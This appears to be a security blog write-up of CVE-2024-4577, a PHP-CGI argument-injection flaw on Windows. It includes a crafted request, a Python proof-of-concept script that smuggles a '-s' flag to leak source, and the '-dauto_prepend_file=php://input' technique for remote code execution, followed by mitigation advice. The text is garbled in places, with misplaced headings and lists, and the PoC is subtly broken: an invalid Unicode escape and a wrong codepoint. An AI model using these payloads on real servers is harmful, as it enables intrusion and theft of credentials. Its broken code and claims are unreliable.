CVE-2024-4577 - PHP CGI "Best-Fit" Unicode Encoding Flaw on Windows Lets Attackers Run Arbitrary Code

In June 2024, security researchers revealed a severe vulnerability affecting PHP when deployed through CGI under Apache on Windows. The issue, tracked as CVE-2024-4577, lets hackers potentially bypass intended protections simply by abusing how Windows handles Unicode/ASCII conversions, allowing remote code execution in some scenarios.

In this article, we’ll break down how this bug works, why it matters, how to check if you’re affected, and examples of real-world exploits—including code snippets to demonstrate the vulnerability and how you might mitigate it.

What’s the Core Vulnerability?

The flaw lives in how PHP-CGI parses command-line options and URL-encoded input on Windows. Specifically, Windows has a concept called "Best-Fit" mapping when converting between wide (Unicode) and narrow (ASCII/MBCS) character sets—something deeply rooted in old code page mechanics.

When using certain code pages (such as Chinese, Japanese, or certain European languages), Windows may turn visually harmless Unicode characters into special ASCII characters—such as a hyphen (-)—used by PHP’s command-line option system.

If you run PHP in CGI mode under Apache on Windows (very common in some shared hosting), a maliciously crafted request can "smuggle" PHP command-line options into the CGI parser, making PHP do things it should never do...

Affected Versions:

Make PHP show your source code (leaking passwords, APIs in scripts)

- Cause PHP to execute arbitrary code if -d flags or similar directives are passed, especially paired with other vulnerabilities

Example:
Passing a crafted unicode request with a "hyphen" sneaked into the path, causing PHP to run with a custom auto_prepend_file or other config.

Say your PHP CGI command-line handler is invoked like this (a typical CGI setup)

ScriptAlias /php-cgi/ "C:/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"

An attacker sends a request such as

GET /index.php/ＥＮＣＯＤＥＤ HTTP/1.1
Host: vulnerable.site

Where ＥＮＣＯＤＥＤ is crafted using Unicode full-width characters that Windows will map to ordinary hyphens (-) or other magic bytes when using certain code pages, such as 936 (GBK for Simplified Chinese).

Here’s a self-contained example (let’s say your server uses code page 936)

import urllib.parse
import requests

# Unicode FULL-WIDTH HYPHEN-MINUS is U+FFD
UNICODE_HYPHEN = '\uFFD'

# 'flag' could be 's' (show source), 'd' (define option)
php_flag = 's'  # Show PHP source code

# Build the malicious URL
malicious_path = f"/index.php/{UNICODE_HYPHEN}{php_flag}"

# URL-encode the path for the HTTP request
url = f"http://vulnerable.site{urllib.parse.quote(malicious_path)}";
print(f"[*] Sending to URL: {url}")

r = requests.get(url)
print(r.text)

If the server is vulnerable and using a susceptible Windows locale/code page, it will interpret this as if the command line contains -s—causing PHP to dump the source code of index.php.

Leaking your source code: Stealing secrets, such as database passwords, APIs, or business logic

- Executing remote code: For example, passing -dauto_prepend_file=php://input and POSTing PHP code to execute arbitrary actions
- Complete server compromise – with the above, privilege escalation is possible if other security layers are weak

Do you use PHP as a CGI binary (not mod_php or FPM)?

3. Is your system using a non-English code page affected by Best-Fit mapping (e.g., Traditional/Simplified Chinese, Japanese)?

Run chcp in your Windows command prompt.

If you see 936 or similar, you’re at higher risk.

Switch to PHP-FPM or mod_php rather than CGI, if possible.

- Block access to /php-cgi/ and similar handlers from untrusted sources at the web server level.

Reference Patch

You can view the PHP security release here:
- PHP Changelog for 8.1.29
- Original Exploit Write-Up (watchTowr)
- Official CVE Details

Conclusion

CVE-2024-4577 is a textbook example of why Unicode and command-line parsing make for a dangerous mix—especially with legacy systems and less-common language settings. If you run PHP on Windows, even as a test server, patch right away.

Use modern, secure deployment methods!

As always, never trust user input, especially when old encoding tricks can turn user data into executable magic.


*Stay safe!* If you enjoyed this deep dive and want more security and exploit breakdowns, contact us or follow our latest posts.

Timeline

Published on: 06/09/2024 20:15:09 UTC
Last modified on: 06/13/2024 04:15:16 UTC